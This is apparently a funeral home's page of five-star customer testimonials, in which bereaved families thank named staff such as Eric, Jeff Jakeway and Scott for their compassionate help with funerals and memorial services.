I need to share how wonderful working with Dean and the VanZantwick Memorial Chapel has been. Losing a family member is so very difficult. Coping and also having to learn things you just don’t want to know makes it so much more difficult. I called and Dean helped me though this difficult process. Everything was taken care of by Dean. I only had to make choices. Choices to honor my father (Edmundo Gutierrez) was the easiest part of this process. Dean and VanZantwicks made the celebration of my fathers life just that. It was a celebration to honor. Dean helped us do so in the best way possible. I really can’t say enough good things. I didn’t leave that day with a smile on my face but when I think back I do smile. We all left with warm hearts knowing celebrated his life and mourned his death at the same time. I thank you Dean and VanZantwicks for your guidance and hard work. We will always be thankful for all you have done. Donna Gutierrez Viveen

5 stars
Donna Viveen August 17, 2019

Very comforting an took their time with us. At first very nervous when you visit but with in 10-15 minutes. Made us feel at ease even allowed us to rememense of our loved one. Very nice atmosphere

5 stars
Eileen Castonguay January 17, 2021

The pre-planning would be the most wonderful thing you can do for your family. We did my mothers back in 2016 and when she passed this month, it was an easy process. it was handled with kindness and comfort and support every step of the way.

5 stars
Ted Forward August 29, 2022

After my mother passed away in December, the funeral home and burial arrangements were all done very well. The funeral home staff was excellent, which was greatly appreciated.

5 stars
Tim Teunis January 02, 2021

Very professional and helpful. My Mother was well taken care of.

5 stars
Bob Teran July 10, 2022

The Lee Chapel handled both our Mother's and Father's funerals 3 months apart. We could not have asked for a more caring, compassionate and professional environment. We thought the planning process would be much more difficult than it was, however, Jason DeWall made this part as easy as it possibly could be. There was not a thing missed. The follow through was amazing. If you have to plan a funeral, I would 100% recommend Sytsema Funeral Home.

5 stars
Nerita Czarny May 09, 2018

Sytsema's has handled many of my family's services can't think of anyone else I would trust.

5 stars
Dallas Goldberg March 28, 2019
5 stars
Chuck LeMaire April 23, 2020
5 stars
Jesse Valentin June 24, 2020

Staff was wonderful. Especially our funeral director Allie. She made sure everything was perfect. The Staff was so helpful and very perfessional. Highly recommend them at a time of loss of a loved one.

5 stars
stacey schmidt August 22, 2020

During a very trying time for the family. Sytema's took care of all aspects we needed with compassion and caring for the family. They try to give you a feeling of ease during a difficult time. Thank you for the kindness you show. We can't thank you enough.

5 stars
Jeffrey Lutz September 02, 2020

Scott Sytsema and their entire team were exceptional in helping and supporting our family with the passing of my Mom (and previously with my Dad). Their service was meticulous in detail and warm and personal in delivery. We never had to worry about details being handled which allowed us to focus all our energy on honoring my Mom's memory. Can't recommend them enough.

5 stars
Clay Ostrom September 21, 2020

Todd Sytsema did a wonderful job. He was available whenever needed, always checking in to make sure we did not have any questions, and made this difficult experience easier. I would highly recommend Sytsema! Thank you for everything.

5 stars
Mary Kitchen October 15, 2020
5 stars
Guy Lombardi November 01, 2020
5 stars
Pamela Whitfield November 09, 2020

My experience with Sytsema was very comfortable and professional. The funeral director Eric was very helpful in assisting with making difficult decisions. Going over and beyond to help us with our memorial service for my grandmother.

5 stars
Kiara Thompson November 10, 2020

Eric and Chris were great! Everything went off without a hitch. They were courteous and professional. They communicated well and were prompt.

5 stars
Michael McGee November 11, 2020

Sytsema Funeral Home was an amazing place to have a memorial service for my mother. Todd was so helpful down to the smallest details and he was always willing to answer any questions I had. Sytsema Funeral Home helped make something that is dreadful to do, easy and hassle free. I would highly recommend them to anyone who would like to provide a beautiful service for their loved one.

5 stars
Hayley Woodworth November 14, 2020

I lost my father mr. Gene sain I called sytsema funeral home and cremation I spoke to Eric he was a very professional kind I never was in charge of anyone memorial service Eric took care of everything for me he explained everything step by step he's very kind and loving and very soft spoken he gave me a peace of mind i just want to say thank you to Eric and sytsema Funeral Home and cremation. Jacquelyn Sain

5 stars
Jackie Sain December 03, 2020

They know their profession well and are patient when questioned, while clear in explaining details. This process was easier than expected and I appreciate Jeff Jakeway for helping us with it all.

5 stars
Onyx Strata December 15, 2020

Systema did an awesome job with my Grandmother. They were as accommodating as possible given the current circumstances. We worked directly with Eric a lot of the time and he exhibited a tremendous amount of patience and compassion. Planning a service for a love one isn’t easy, but Eric and the Systema team took a lot of the guesswork out of planning. Thank you all, -Simmons Family

5 stars
Lashae Simmons December 21, 2020

Eric was a blessing to our family during our time of loss. The level of professionalism he brings is remarkable. My beloved Mom ( Yvonne Simmons) would have been elated about the way her home going services was handled. I appreciate The Sytsema Family and there is not enough words created that can express my gratitude! Thank you All especially Eric! May God Bless, Lashae Simmons (daughter of deceased)

5 stars
Lashae Simmons December 22, 2020

Wonderful staff. Very caring and compassionate. Unfortunately, we have had to use Sytsema 3 times in the last few years. Once for my granddaughter Aubree, then my grandma and on Christmas Day this year my 30 year old son passed away. We have had Jason as our director all 3 times (the last 2 we’re at our request). He is wonderful. We will always return to Sytsema if tragedy hits our family again.

5 stars
Lisa Keeney December 30, 2020

My family suffered a devastating loss. My sister was a kind and loving person. We needed to know that she would be taken care of with love. Eric Hathorn and the staff at Systema definitely did not disappoint. Eric was kind, patient, and caring as if this was his family member. We thank him from the bottom of hearts. We were all pleased with Eric’s professionalism and compassion. Thank you again Eric Hathorn and Systema Funeral Home❤️❤️❤️❤️

5 stars
Marie Williams February 16, 2021

Sytsema made it so simple and stress free enabling me to plan a funeral from long distance not being able to actually be there to assist in the planning and I have to say YOU GUYS WERE AMAZING. My Family appreciates EVERYTHING your company has done for us. Eric seemed like family to us when we were all said and done. Thanks Sytsema

5 stars
gamer 4 life May 04, 2021

I was very pleased the care for my grandmother Lucille Redd. From the time she was picked up to the very end of her service. I thank Eric for his professionalism and helping my family and I through this difficult time.

5 stars
Thomas Washington May 13, 2021

I never knew what real pain was until I lost my mother Latecia Everette on Mother’s Day 2021. This was an experience i wasn’t prepared for. I had never made funeral arrangements before however my mother stated while she was alive exactly how she wanted things to go. Knowing what she wanted I expected a funeral home to help me make her wishes come true. From the moment my family and I walked through the door we felt welcomed. They even had everette family on the door. Eric and the staff wanted to know about my mother before we went into any other details. Which really warmed my heart. That was the first time I had smiled since I lost my mother. Eric took a huge load off of me which allowed me time to actually grieve. After being treated so poorly by fountain funeral home. I thought I had no choice but to deal with the horrible service. That’s until an amazing friend of mine sent Eric my way to help. I am beyond grateful. I don’t know what I would have done without Eric and the staff. I highly recommend Truly thankful MarCia Everette

5 stars
MarCia Gabrielle June 06, 2021

The services we received was spectacular! I was totally lost and confused during this time. Eric came in and made this very sad and difficult time less stressful and as smooth as it could’ve been. I could never express my family’s gratitude to him for his professionalism and willingness to go above and beyond his job responsibilities. The support Eric offered extended beyond just basic funeral services; it was like he was family. Systema really cares!

5 stars
JD Trotman August 20, 2021

Eric Hathorn and stuff were wonderful after the passing of my brother back in April of 2021. We had a funeral service here in Muskegon then, we decided to take his reminds to Mexico. Eric went above and beyond helping our family with all this process. He sacrificed his vacation to ensure his remims made it to Mexico within a week. Eric is very professional, dedicated, and passionate at what he does.

5 stars
Maribel Diaz August 21, 2021

My experience with Sytsema funeral homes was awesome. Mr. James Sytsema was very professional, polite and passionate about his job, things that I had forgot to take care of he was right on top of it. Although it was a sad occasion everyone raved how the staff was very courteous and friendly. My family and I enjoy working with Mr. James Sytsema I gave James and staff a 5 plus. Thank you all for making it easier on our family 😊

5 stars
V Evans October 05, 2021

My experience with Systema Funeral Home was the BEST...took great care when I lost my Mom in 2001, my Dad in 2006 and recently when I lost my brother on 01/19/2022. The compassionate, professional and dedicated funeral director, Scott Vanderlaan and his staff were absolutely wonderful. Made a devastating & difficult loss much easier. Scott was available whenever I texted or called...any day & anytime, even on one of his vacation days. I would highly recommend Systema to anyone suffering a loss.

5 stars
Barbara Homrich February 26, 2022

I would not ask for anything more. I can't say enough good things about the care and service we received.

5 stars
December 21, 2020

We couldn't have given my wife a better send off. The staff was professional and also super friendly and made the experience better than I ever could have imagined. Thanks!!!

5 stars
Benjamin Whalen May 28, 2019

Sytsema's care, professionalism, tact, and dignity are second to none. How they took care of my mother, myself and my family at this difficult time was wonderful. They truly are the leader in our town.

5 stars
Larry Rolison May 20, 2019

I love Sytsema Funeral Home. We have used you guys for years and no matter what happens we will always go back to your place to put any family member to rest. Because I know that you always do the right things when it comes to it.

5 stars
Loretta Linberry April 26, 2019

I cannot say enough positive comments about Scott and Sytsema's entire staff. They certainly made this very difficult situation easier.

5 stars
Kirstin DeMaio March 19, 2019

This is my third experience with Bob Vanderlaan assisting me and my family with planning services for our loved ones and, as always, he did not disappoint. Always kind, considerate, helpful and extremely professional.

5 stars
Beverly Ring August 10, 2018

Jeff Jakeway was a pleasure to work with. He was not only extremely helpful but also sincere, compassionate and kind. Thank you, Jeff, for helping us through this difficult time.

5 stars
Isabel Evans July 18, 2018

The service we received was top notch. Both my father and mother were taken care of here. They made a very difficult time easier for all of us. Very caring and compassionate personnel. Keep up the good work!

5 stars
Diane Norbury June 04, 2018

Dan went above and beyond for me. He handled a difficult insurance problem, took the extra time to help us process the paperwork while maintaining a professional and positive attitude! Thanks, Dan.

5 stars
Jennifer Blessman May 04, 2018

Jeff Jakeway was extremely helpful in securing a burial plot, and with follow-up paperwork such as Social Security and life insurance.

5 stars
Joyce Ruster February 14, 2018

I don't know how Sytsema's could improve anymore- for staff to services. They did my husband's service 12/9/2017 and was very pleased.

5 stars
Carolyn Ahrens February 07, 2018

I and my family were so impressed by every aspect of Sytsema's team of wonderful, caring, empathetic, knowledgeable people. They made the three events celebrating my husband's life so meaningful to all who attended. "When it means everything" - They did everything. I'm forever grateful!

5 stars
JT September 15, 2017

We all appreciated the kind, compassionate care and professional service we received for my dad's visitation and funeral. Thank you.

5 stars
Virginia S. September 07, 2017

On Friday, our father and friend passed away. There were too many things happening too fast for the 3 days prior to his death that memories often overlook small details. Hospice called Sytsema to remove his body and within an hour or so, two young men arrived. I cannot forget a detail like someone coming to take our father away. I commend these young men for their demeanor, their politeness, their sensitivity and maturity in meeting the needs and concerns of those who were there at the time. These young men instructed us all on what they would be doing and they did it so well that I never saw them leave the premises. Our heartfelt gratitude and praise goes out to everyone at Sytsema for all the compassion and love they have shown us during this time of our loss. Also, thank you for presenting our father at the visitation and funeral with great honor and dignity. You all were wonderful.

5 stars
KS July 19, 2017

Jeffrey Jakeway was a very big help to me. My husbands death was sudden and Jeffrey took a lot of time with my family and I. Thank you so much to Jeffrey and Sytsema Funeral Home.

5 stars
Jackie DeGroot February 10, 2017

Sytsema Funeral Home-Lee Chapel did an outstanding service to our family during the loss of my father. The professionalism & compassion from every staff member was greatly appreciated. Scott was (over) personally very attentive to all of our needs. I had a lot of comments on how nice dad looked and how wonderful the service was a wonderful tribute to my dad. Outstanding job. I am very thankful. Well done for Lee Chapel.

5 stars
Mary Sikkenga February 06, 2017

I want to thank you for the wonderful service that the whole team at Sytsema provided to my family and especially to my mother during this very difficult time. The attention to detail and keeping us all on track and on the same page during the three weeks of planning the Memorial was extremely helpful and appreciated. I know this is your expertise, but wanted to express my sincere appreciation for your kindness and helpfulness throughout the entire process. I feel at peace with the way we were able to honor my father's life and spirit during the Memorial and couldn't have been happier with the setting and presentation. Thank you again for your help in getting us through one of life's most difficult transitions.

5 stars
Marisa Green February 08, 2017

Sytsema has been so helpful, understanding and supportive...they continue to maintain and offer personal with professional help in a very difficult time.

5 stars
SW October 28, 2016

There just isn't another funeral home with such compassion and professionalism.

5 stars
AA August 09, 2016

Our family and extended family felt that the staff and services of Sytsema Funeral Homes was excellent. Everyone made us feel comfortable and relaxed during a very difficult time.

5 stars
BP June 28, 2016

They are the Best!

5 stars
WO May 23, 2016

I just want to express our gratitude and relief for all the arrangements and duties performed by Sytsema and Daniel Achterhoff.

5 stars
BM November 20, 2015

Could not have done a better job.

5 stars
EE November 11, 2015

Words can never express our thankfulness for the kindness and compassion shown to us during this most difficult time. You went above and beyond to make sure every detail was taken care of, making Denny's funeral service a true celebration of his life. For that, we will be forever grateful.

5 stars
Sue & Family October 20, 2015

Excellent in every area!

5 stars
RL August 25, 2015

"Thank you so much for your professional service and lovely facilities. You made celebrating the life of my grandmother a smooth and hassel-free experience. Thank you for your calm guidance, allowing family to be involved in the service, and ensuring that the family was well-informed in what was going on. While funerals are not a happy time- your facilitation and facilities allowed our family to focus on connecting instead of details. Thank you!"

5 stars
S.A. July 28, 2015

How can I possibly thank you for all of your kindnesses. You were a blessing to me and to my entire family during this difficult time. We could not have gotten through this without you. Years ago, when I had you to our home to prepare for this day, we knew we had made the right choice. Your faith, kindness, and sincerity were so apparent.

5 stars
S.O. July 24, 2015

Everything was handled extremely well, couldn't have asked for more.

5 stars
Bruce Anderegg June 19, 2015

Everyone A-1 professionals. Very caring. Excellent run funeral home.

5 stars
CP June 17, 2015

They did a great job, above and beyond expectations!

5 stars
VR May 13, 2015

Amazing staff. Great communication and the staff listened and cared that all our wishes were taken care of. This type of care is rarely seen by businesses. They are truly offering a great service! Thank you.

5 stars
LG May 01, 2015

We could not have any better care anywhere!

5 stars
GB April 28, 2015

Everything was beautiful, we were all very pleased!

5 stars
DB March 23, 2015

I have had two (2) loved ones pass away in the last few months. Bob was truly sent by God! He was so caring. He really helped us and the little grandkids get through this.

5 stars
Mary Jo Langlois March 11, 2015

Pre-planning my mother's funeral with my her was hard, but it was the best gift she could have given to me. The sympathy and support shown to us by all the staff was more than we could have hoped. I would encourage everyone to look into pre-planning arrangements. THANK YOU!

5 stars
KB February 25, 2015

I was very happy with Sytsemas service and patience at this very difficult time.

5 stars
JB January 29, 2015

Everything was excellent and great help!

5 stars
SB January 29, 2015

They did a terrific job. A beautiful funeral and service for my mother.

5 stars
JS January 22, 2015

They did a great job. They always do.

5 stars
JH September 27, 2014

Completely Satisfied!!

5 stars
JD November 30, 2014